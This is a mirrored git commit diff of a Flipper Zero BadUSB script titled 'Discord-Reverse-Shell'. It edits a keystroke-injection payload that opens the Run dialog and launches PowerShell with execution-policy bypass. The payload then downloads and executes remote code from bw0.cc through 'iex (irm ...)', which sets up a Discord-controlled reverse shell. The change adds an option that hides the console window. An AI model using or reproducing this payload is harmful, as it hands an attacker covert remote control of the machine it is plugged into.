mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-12 07:40:44 -08:00
Update Discord-Reverse-Shell.txt
This commit is contained in:
@@ -11,13 +11,12 @@ REM Change BOT_TOKEN below with your bot token
|
|||||||
REM Change CHANNEL_ID below to your channel id
|
REM Change CHANNEL_ID below to your channel id
|
||||||
REM for more info goto - https://github.com/beigeworm/PoshCord-C2
|
REM for more info goto - https://github.com/beigeworm/PoshCord-C2
|
||||||
|
|
||||||
REM some setup for dukie script
|
REM To hide the console, use $hide='y' below.
|
||||||
DEFAULT_DELAY 100
|
|
||||||
|
|
||||||
REM open powershell (remove "-W H" to show the window)
|
REM open powershell
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 750
|
DELAY 750
|
||||||
STRING powershell -Ep Bypass -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs)
|
STRING powershell -Ep Bypass -C $hide='y'; $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs)
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user